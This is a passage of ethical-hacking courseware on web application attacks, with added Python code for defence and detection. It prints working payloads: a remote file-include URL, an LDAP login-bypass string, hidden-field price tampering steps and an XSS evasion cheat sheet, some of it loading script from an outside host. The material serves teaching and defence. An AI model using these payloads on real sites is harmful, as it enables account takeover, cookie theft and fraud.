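    print("as one argument:", run_without_shell(probe))
    print("argv for valid address:", sendmail_argv("addi@juggyboy.com"))
    print("argv for probe:", sendmail_argv(probe))
```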
  • 49. Command Injection Example. http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036 (JuggyBoy form: User Name Addison, Email Address addi@juggyboy.com, Site URL www.juggyboy.com, Banner URL .gif||newpassword|1036|60|468, Password newpassword). Poor input validation at the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands. Attacker launching code injection attack; malicious code: www.juggyboy.com/banner.gif||newpassword||1036|60|468
  - An attacker enters malicious code (account number) with a new password
  - The last two sets of numbers are the banner size
  - Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword"
  - The server script assumes that only the URL of the banner image file is inserted into that field
The following is an example of command injection: To perform a command injection attack, the attacker first enters malicious code (account number) with a new password. The last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is inserted into that field.
  • 50. [Figure 13.9: Command Injection Example. Screenshot of http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036 with the form fields User Name (Addison), Email Address (addi@juggyboy.com), Site URL (www.juggyboy.com), Banner URL (.gif||newpassword|1036|60|468) and Password (newpassword). Attacker launching code injection attack; malicious code: www.juggyboy.com/banner.gif||newpassword||1036|60|468. Poor input validation at the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands.]
  • 51. File Injection Attack. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. Client code running in a browser:
    <form method="get">
    <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
    </select>
    <input type="submit">
    </form>
Vulnerable server code:
    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>
The attacker injects a remotely hosted file at www.jasoneval.com containing an exploit: http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
Users are allowed to upload various files to the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If the uploaded file ends with a php extension and any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.
Consider the following client code running in a browser:
    <form method="get">
    <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
    </select>
    <input type="submit">
    </form>
Vulnerable PHP code:
    <?php
    $drink = 'coke';
  • 52.     if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>
To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit. Exploit code:
    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
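Added example, not the courseware's PHP: the DRINK parameter resolved through a fixed allow-list instead of being concatenated into an include path, with a classifier that reports why a rejected value is dangerous so the attempt can be logged. The template table stands in for the .php files on disk.

```python
from urllib.parse import urlsplit

# Constructed allow-list: request value -> template actually on disk.
TEMPLATES = {"pepsi": "pepsi.php", "coke": "coke.php"}
DEFAULT_DRINK = "coke"


def include_vulnerable(drink):
    """The slide's logic: whatever arrives becomes a file reference, so a
    URL or a traversal sequence is turned into the thing to include."""
    return drink + ".php"


def classify_include_value(value):
    """Describe what kind of reference a raw value would be: a remote URL,
    a path outside the template directory, or a plain local name."""
    parts = urlsplit(value)
    if parts.scheme or value.startswith("//"):
        return "remote"
    if ".." in value.split("/") or value.startswith("/") or "\x00" in value:
        return "traversal"
    return "local"


def include_safe(drink=DEFAULT_DRINK):
    """Map the request value onto the allow-list. Anything else falls back
    to the default and is reported (second element) for the audit log;
    the raw value is never used to build a path."""
    if drink in TEMPLATES:
        return TEMPLATES[drink], None
    reason = classify_include_value(drink)
    return TEMPLATES[DEFAULT_DRINK], f"rejected include value ({reason}): {drink!r}"


if __name__ == "__main__":
    for value in ("pepsi", "http://jasoneval.com/exploit?", "../../etc/passwd"):
        print(value, "->", include_vulnerable(value), "|", include_safe(value))
```

Disabling remote includes at the interpreter level (PHP's allow_url_include setting) is a second, independent layer; the allow-list is what stops the local-file variant as well.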
  • 53. What Is LDAP Injection? An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree.
Filter syntax: (attributeName operator value)
    Operator    Example
    =           (objectclass=user)
    >=          (mdbStorageQuota>=100000)
    <=          (mdbStorageQuota<=100000)
    ~=          (displayName~=Foeckeler)
    *           (displayName=*John*)
    AND (&)     (&(objectclass=user)(displayName=John))
    OR (|)      (|(objectclass=user)(displayName=John))
    NOT (!)     (!objectClass=group)
LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model and clients can search the directory entries using filters.
An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All inputs to the LDAP must be properly filtered; otherwise vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed from LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail to sanitize input. These services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries.
It is based on the client-server model and clients can search the directory entries using filters.
  • 54. [Figure 13.10: LDAP Injection. Filter syntax (attributeName operator value) with the operator/example table shown above.]
  • 55. How LDAP Injection Works. Normal operation: the client sends a normal query to the LDAP server and receives a normal result. Operation with code injection: the client sends a normal query plus code injection and receives a normal result and/or additional information. LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. If an attacker enters the valid user name "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server, i.e. only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password. (Account login form: Username juggyboy)(&)), Password blah, Submit.)
LDAP injection attacks are commonly used on web applications. LDAP injection applies to any application that has some kind of user input used to generate LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. Depending upon the implementation of the target, one can try to achieve:
  - Login bypass
  - Information disclosure
  - Privilege escalation
  - Information alteration
  • 56. Normal operation: Client sends Normal Query to LDAP Server; LDAP Server returns Normal Result. FIGURE 13.11: Normal operation
Operation with code injection: Client sends Normal Query + Code Injection to LDAP Server; LDAP Server returns Normal Result and/or Additional Information. FIGURE 13.12: Operation with code injection
Attack: If an attacker enters a valid user name of "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server; only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password. Account Login form (Attacker): Username: juggyboy)(&)) Password: blah. FIGURE 13.13: Attack
Module 13 Page 1778
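Added example (Python; not code from the EC-Council slides): the fix for the login-bypass case above is to escape every user-supplied value before it is placed in the filter, as RFC 4515 specifies, and to refuse any built filter that is no longer a single expression. The attribute names USER and PASS are the slide's, not a real directory schema; the function names are assumptions.

```python
import re

# Added example (not from the CEH material): RFC 4515 escaping for values
# interpolated into an LDAP search filter, plus a structural check that a
# built filter is still exactly one expression. Attribute names USER and
# PASS come from the slide, not from any real directory schema.

_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """Escape the characters that carry meaning inside an LDAP filter (RFC 4515)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(user: str, password: str) -> str:
    """String concatenation as on the slide: user input becomes filter syntax."""
    return f"(&(USER={user})(PASS={password}))"


def build_login_filter_safe(user: str, password: str) -> str:
    """Same filter, but every user-controlled value is escaped first."""
    return f"(&(USER={escape_filter_value(user)})(PASS={escape_filter_value(password)}))"


def filter_is_single_expression(flt: str) -> bool:
    """True if parentheses balance and the filter closes exactly once, at its end.

    The injected value on the slide closes the outer (&...) early, so the
    filter reaches depth 0 before the string ends; that is what lets the
    server evaluate only the always-true first part.
    """
    depth = 0
    for i, ch in enumerate(flt):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and i != len(flt) - 1:
                return False
    return depth == 0


_FILTER_META = re.compile(r"[()*\\\x00]")


def looks_like_ldap_injection(value: str) -> bool:
    """Input-side signal for logging/alerting: filter metacharacters in a login field."""
    return _FILTER_META.search(value) is not None


if __name__ == "__main__":
    user, pwd = "juggyboy)(&))", "blah"   # constructed input taken from the slide
    for build in (build_login_filter_unsafe, build_login_filter_safe):
        flt = build(user, pwd)
        print(flt, "single expression:", filter_is_single_expression(flt))
```

Escaping turns the injected parentheses into \28 and \29, so the directory compares them as literal characters of the user name and the password clause is still evaluated; the structural check is a cheap second line of defence for filters assembled elsewhere in the code base.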
  • 57. Hidden Field Manipulation Attack
Attack Request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
Normal Request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00
HTML Code:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, which are not rendered to the screen by the browser but are collected and submitted as parameters during form submissions. Attackers can examine the HTML code of the page and change the hidden field values in order to change POST requests to the server.
Form as rendered: Product Name: Juggyboy Shirt; Product Price: 200; Submit
Hidden Field Manipulation Attack: Hidden field manipulation attacks are mostly used against e-commerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). At the time of development of such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the price of the product and complete a transaction with the price that he or she has altered, rather than the actual price of the product. For example: on eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, it often also loses its credibility in the market.
When any target requests web services and makes choices on the HTML page, the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). HTML pages generally save field values as hidden fields; they are not displayed on the target's monitor but are saved and sent as strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change POST requests to the server.
<input type="hidden" name="PRICE" value="200.00">
Module 13 Page 1779
  • 58. Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden manipulation.
Attack Request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
FIGURE 13.14: Hidden Field Manipulation Attack
Normal Request: http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00
HTML Code (Hidden Field Price = 200.00): <form method="post" action="page.aspx"> <input type="hidden" name="PRICE" value="200.00"> Product name: <input type="text" name="product" value="Juggyboy Shirt"><br> Product price: 200.00<br> <input type="submit" value="submit"> </form>
Module 13 Page 1780
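Added example (Python; not code from the EC-Council slides): the attack works only because page.aspx trusts the PRICE value the browser sends back. The handler below shows that trust beside the fix, which is to look the price up server-side by product and treat a mismatching client value as a tamper signal worth logging. The catalogue, URLs and function names are constructed for the example.

```python
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs, urlsplit

# Added example (not from the CEH material). Constructed catalogue: the
# server, not the hidden form field, is the authority on price.
CATALOG = {"Juggyboy Shirt": Decimal("200.00")}

# The two requests shown on the slide.
NORMAL_REQUEST = "http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00"
ATTACK_REQUEST = "http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00"


def params_from_url(url: str) -> dict:
    """Single-valued query parameters of a request URL (percent-decoding applied)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def checkout_vulnerable(params: dict) -> dict:
    """Charges whatever the hidden PRICE field says, as the slide's page does."""
    return {"product": params["product"], "charged": Decimal(params["price"])}


def checkout_hardened(params: dict) -> dict:
    """Looks the price up server-side; the client value is only a tamper signal."""
    product = params.get("product")
    if product not in CATALOG:
        raise ValueError("unknown product")
    charged = CATALOG[product]
    tampered = False
    claimed = params.get("price")
    if claimed is not None:
        try:
            if Decimal(claimed) != charged:
                tampered = True   # worth logging: the hidden field was altered in transit
        except InvalidOperation:
            tampered = True       # non-numeric price: also not what the form sent out
    return {"product": product, "charged": charged, "tampered": tampered}


if __name__ == "__main__":
    for url in (NORMAL_REQUEST, ATTACK_REQUEST):
        p = params_from_url(url)
        print("client price:", p["price"], "| vulnerable charges:",
              checkout_vulnerable(p)["charged"], "| hardened:", checkout_hardened(p))
```

The same rule applies to any hidden field that carries a business value (discount rate, quantity limit, user role): keep it server-side, keyed by an identifier the client can send, and if the field must round-trip through the browser, sign it so alterations are detectable.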
  • 59. Cross-Site Scripting (XSS) Attacks
Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.
Consequences: Session hijacking; Brute force password cracking; Data theft; Intranet probing; Keylogging and remote monitoring; Malicious script execution; Redirecting to a malicious server; Exploiting user privileges; Ads in hidden IFRAMEs and pop-ups; Data manipulation
Cross-Site Scripting (XSS) Attacks: Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses web applications to send malicious code, in JavaScript, to different end users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions.
An attacker often uses different methods to encode the malicious portion (Unicode) of the tag, so that a request seems genuine to the user. Some of the attacks this makes possible are: Malicious script execution; Session hijacking; Brute force password cracking; Redirecting to a malicious server; Exploiting user privileges; Data theft; Intranet probing; Ads in hidden IFRAMEs and pop-ups; Data manipulation; Keylogging and remote monitoring
Module 13 Page 1781
  • 60. How XSS Attacks Work
This example uses a vulnerable page which handles requests for a nonexistent page, a classic 404 error page.
Normal Request: http://juggyboy.com/jason_file.html
Server Code:
<html>
<body>
<?php print "Not found: " . urldecode($_SERVER["REQUEST_URI"]); ?>
</body>
</html>
Server Response: 404 Not found /jason_file.html
XSS Attack Code: http://juggyboy.com/<script>alert("WARNING: The application has encountered an error");</script>
Server Response: the 404 page with the injected script reflected into it
FIGURE 13.15: How XSS Attacks Work
How XSS Attacks Work: To understand how cross-site scripting is typically exploited, consider the following hypothetical example.
Module 13 Page 1782
  • 61. Cross-Site Scripting Attack Scenario: Attack via Email
Diagram: Attacker sends email with malicious link ("Hi, You have won a lottery of $2M, click the link to claim it. <A HREF=http://juggyboy.com/...."). User clicks the malicious link. Server sends a page to the user with client profile (Name: Shaun; Age: 31; Location: UK; Occupation: SE; Last visit: Sept 21, 2010). Malicious code is executed on the client web browser.
In this example, the attacker crafts an email message with a malicious script and sends it to the victim:
<A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. The legitimate server sends a page back to the user including the value of clientprofile, and the malicious code is executed on the client machine.
Cross-Site Scripting Attack Scenario: Attack via Email: In a cross-site scripting attack via email, the attacker crafts an email that contains a link to a malicious script and sends it to the victim.
Malicious Script: <A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. Then the server sends a page back to the user including the value of clientprofile, and the malicious code is executed on the client's machine. The following diagram depicts the cross-site scripting attack scenario via email:
Module 13 Page 1783
  • 62. Diagram labels: Sends email with malicious link; Request is received by legitimate server. FIGURE 13.16: Attack via Email
Module 13 Page 1784
  • 63. XSS Example: Attack via Email
Diagram: Legitimate Server, Attacker's Server, User's Browser. Malicious Script: <A HREF=http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>. Steps: construct a malicious link; email the URL to the user and convince the user to click on it; request the page; page with malicious script; run.
XSS Example: Attack via Email: The following are the steps involved in an XSS attack via email:
1. Construct a malicious link: <A HREF=http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
2. Email the URL to the user and convince the user to click on it.
3. User requests the page.
4. Legitimate server sends a response page with malicious script.
5. Malicious script runs on the user's browser.
Module 13 Page 1785
  • 64. Diagram: Legitimate Server, Attacker's Server, User's Browser. Malicious Script: <A HREF=http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>. Construct a malicious link. FIGURE 13.17: Attack via Email
Module 13 Page 1786
  • 65. XSS Example: Stealing Users' Cookies
Diagram: Attacker's Server, User's Browser, Malicious Script. Host a page with malicious script; view the page hosted by the attacker; HTML containing malicious script; run; collect user's cookies; redirect to attacker's server; send the request with the user's cookies.
XSS Example: Stealing Users' Cookies: To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then installs a cookie stealer (cookie logger). The following are the various steps involved in stealing a user's cookies with the help of an XSS attack:
1. Attacker initially hosts a page with malicious script
2. The user visits the page hosted by the attacker
3. The attacker's server sends the response as HTML containing malicious script
4. The user's browser runs the malicious script in the HTML
5. The cookie logger present in the malicious script collects the user's cookies
6. The malicious script redirects the user to the attacker's server
7. The user's browser sends the request with the user's cookies
Module 13 Page 1787
  • 66. Diagram: Attacker's Server, User's Browser, Malicious Script. View the page hosted by the attacker; HTML containing malicious script; run; collect user's cookies; redirect to attacker's server; send the request with the user's cookies. FIGURE 13.18: Stealing Users' Cookies
Module 13 Page 1788
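Added example (Python; not code from the EC-Council slides): steps 5 to 7 above depend on script being able to read the session cookie and on the browser attaching it to the attacker-directed request. A Set-Cookie audit that checks for the HttpOnly, Secure and SameSite attributes catches the misconfiguration that makes that possible. The cookie name, values and function names are constructed for the example.

```python
# Added example (not from the CEH material): audit of Set-Cookie attributes.
# HttpOnly removes the cookie from document.cookie (the cookie logger's
# source), Secure keeps it off plaintext HTTP, and SameSite keeps it off
# cross-site requests. Cookie name and values are constructed.

def parse_set_cookie(header: str):
    """Split a Set-Cookie header value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_session_cookie(header: str) -> list:
    """Return the weaknesses found in one Set-Cookie header (empty list means none)."""
    _, _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie, so injected script can copy it")
    if "secure" not in attrs:
        findings.append("missing Secure: also sent over plaintext HTTP")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests (CSRF exposure)")
    return findings


def issue_session_cookie(session_id: str) -> str:
    """Hardened Set-Cookie value for a session identifier (SESSIONID is a constructed name)."""
    return f"SESSIONID={session_id}; Path=/; HttpOnly; Secure; SameSite=Strict"


if __name__ == "__main__":
    for hdr in ("SESSIONID=abc123; Path=/", issue_session_cookie("abc123")):
        print(hdr, "->", audit_session_cookie(hdr) or "ok")
```

Run against the headers a staging deployment actually returns (for instance from a proxy log); a cookie that fails the HttpOnly check is the one an XSS payload can exfiltrate, which is also what to look for when triaging a reported XSS.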
  • 67. XSS Example: Sending an Unauthorized Request
Diagram: Attacker's Server, Malicious Script, User's Browser. Construct a malicious link; email the URL to the user and convince the user to click on it; request the page; page with malicious script; run; an unauthorized request.
XSS Example: Sending an Unauthorized Request: Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request:
1. Attacker constructs a malicious link
2. Sends an email containing the URL to the user and convinces the user to click on it
3. The user's browser sends a request to the attacker's server for the page
4. The attacker's server, in response to the user's request, sends the page with malicious script
5. The user's browser runs the malicious script
6. The malicious script sends an unauthorized request
Module 13 Page 1789
  • 68. FIGURE 13.19: Sending an Unauthorized Request
Module 13 Page 1790
  • 69. XSS Attack in Blog Posting
Diagram: Malicious code <script>onload=window.location='http://www.juggyboy.com'</script> is injected into the blog post. User redirected to a malicious website, juggyboy.com (Malicious Website). Web Application.
XSS Attack in a Blog Posting: The following diagram depicts the XSS attack in a blog posting: Malicious code <script>onload=window.location='http://www.juggyboy.com'</script> is injected into the blog post. User redirected to a malicious website, juggyboy.com. Attacker adds a malicious script in the comment field of the blog post. Comment with malicious link is stored on the server (Web Application, Database Server). FIGURE 13.20: XSS Attack in a Blog Posting
Module 13 Page 1791
  • 70. XSS Attack in Comment Field
Diagram: User visits the I Tech Post website. Post: "Facebook acquires file-sharing service. New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options." Comment: "Jason, I love your blog post! - Mark (mark@miccasoft.com)". Leave your comment. Malicious code <script>alert("Hello World")</script> is injected into the blog post. The alert pops up as soon as the web page is loaded (Pop-up Window). Comment with malicious link is stored on the server (Web Application, Database Server).
XSS Attack in a Comment Field: Many Internet web programs use HTML pages that dynamically accept data from different sources. The data in the HTML pages can be dynamically changed according to the request. Attackers use the HTML web page's tags to manipulate the data and launch the attack by placing a malicious script in the comments feature. When the target views the comment and activates it, the malicious script is executed in the target's browser, initiating malicious actions.
Module 13 Page 1792
  • 71. Diagram: Malicious code <script>alert("Hello World")</script> is injected into the blog post. The alert pops up as soon as the web page is loaded. Post: "Facebook acquires file-sharing service. New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options." Leave your comment: "Jason, I love your blog post! <script>alert("Hello World")</script>". Attacker adds a malicious script in the comment field of the blog post. Comment with malicious link is stored on the server (Attacker, Pop-up Window, Web Application, Database Server). FIGURE 13.21: XSS Attack in a Comment Field
Module 13 Page 1793
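Added example (Python; not code from the EC-Council slides): both the reflected case (the 404 page on slide 60, which prints the decoded request URI straight into the body) and the stored case (the comment field above) have the same root cause and the same fix: output encoding for the HTML context the data lands in. The block rebuilds the slide's PHP 404 handler in Python, once vulnerable and once encoded, and applies the same encoder to a stored comment. URIs and comment text are constructed from the slides; the function names are assumptions.

```python
import html
from urllib.parse import unquote

# Added example (not from the CEH material): the slide's 404 page rebuilt in
# Python, once reflecting the URI raw (as the PHP on the slide does) and once
# HTML-encoding it; the same encoder renders a stored comment. URIs and the
# comment text are constructed from the slides.

def not_found_page_vulnerable(request_uri: str) -> str:
    """Equivalent of: print "Not found: " . urldecode($_SERVER["REQUEST_URI"])."""
    return "<html><body>Not found: " + unquote(request_uri) + "</body></html>"


def not_found_page_hardened(request_uri: str) -> str:
    """Decode once, then encode for the HTML text context before reflecting."""
    return "<html><body>Not found: " + html.escape(unquote(request_uri), quote=True) + "</body></html>"


def render_comment(author: str, text: str) -> str:
    """Stored comment rendered with the same encoding: markup becomes literal text."""
    return f"<p><b>{html.escape(author, quote=True)}</b>: {html.escape(text, quote=True)}</p>"


def has_active_script(page: str) -> bool:
    """Check used by the tests: does the output still contain an unencoded <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    attack = '/<script>alert("WARNING: The application has encountered an error");</script>'
    print(not_found_page_vulnerable(attack))
    print(not_found_page_hardened(attack))
    print(render_comment("Mark", 'I love your blog post! <script>alert("Hello World")</script>'))
```

html.escape handles the HTML text and attribute-value contexts; data placed inside a script block, a URL, or a CSS value needs the encoder for that context instead, which is why templating engines that auto-escape per context are the usual production answer.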
  • 72. XSS Cheat Sheet
XSS locator: ';!--"<XSS>=&{()}
Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">
Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">
IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">
Image XSS: <IMG SRC="javascript:alert('XSS');">
Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>
Non-alpha-non-digit part 2 XSS: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>
Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>
No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>
Local htc file: <XSS STYLE="behavior: url(xss.htc);">
Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Embedded tab: <IMG SRC="jav	ascript:alert('XSS');">
Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"
Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <
VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>
Mocha: <IMG SRC="livescript:[code]">
Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">
Embedded newline: <IMG SRC="jav&#x0A;ascript:alert('XSS');">
XSS with no single quotes or double quotes or semicolons: <SCRIPT>alert(/XSS/.source)</SCRIPT>
Escaping JavaScript escapes: \";alert('XSS');//
End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾
META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
FIGURE 13.22: XSS Cheat Sheet
Module 13 Page 1794
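Added example (Python; not code from the EC-Council slides): the point of the cheat sheet for a defender is that matching raw request strings for "<script" or "javascript:" misses the encoded-tab, carriage-return and mixed-case variants. The detector below normalises first (repeated URL and entity decoding, control-character removal, lower-casing) and then applies a few signatures, run over constructed CLF-style access-log lines whose payloads mirror entries in the list above. Log lines, addresses and function names are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# Added example (not from the CEH material): a normaliser plus signature check
# for request data, run over constructed access-log lines. Encoded tabs,
# carriage returns and mixed case all survive a naive "<script" or
# "javascript:" test; decoding and stripping control characters first does not.

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

SIGNATURES = {
    "script-tag": re.compile(r"<\s*script"),
    "script-url": re.compile(r"\b(javascript|vbscript|livescript)\s*:"),
    "event-handler": re.compile(r"<[a-z]+[^>]*\bon[a-z]+\s*="),
}


def normalize(value: str) -> str:
    """Undo layered URL/HTML-entity encoding, drop control chars, lower-case."""
    cur = value
    for _ in range(3):                       # bounded: attackers stack encodings
        nxt = html.unescape(unquote(cur))
        if nxt == cur:
            break
        cur = nxt
    return CONTROL_CHARS.sub("", cur).lower()


def flag_xss(value: str) -> list:
    """Names of the signatures that match the normalised value."""
    norm = normalize(value)
    return [name for name, pat in SIGNATURES.items() if pat.search(norm)]


def scan_log(lines) -> list:
    """(line_number, matched_signatures) for lines whose request path looks like XSS."""
    hits = []
    for no, line in enumerate(lines, 1):
        try:
            request = line.split('"')[1]     # the quoted "METHOD path HTTP/x" field
            path = request.split(" ")[1]
        except IndexError:
            continue                         # not a CLF line; skip rather than crash
        found = flag_xss(path)
        if found:
            hits.append((no, found))
    return hits


# Constructed log lines (CLF-style); payloads mirror cheat-sheet entries.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2012:10:00:00 +0000] "GET /search?q=javascript+tutorial HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2012:10:00:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2012:10:00:02 +0000] "GET /comment?text=%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert(%27XSS%27)%3B%22%3E HTTP/1.1" 200 88',
    '10.0.0.7 - - [01/Jan/2012:10:00:03 +0000] "GET /comment?text=%3CIMG%20SRC%3DJaVaScRiPt%3Aalert(%27XSS%27)%3E HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

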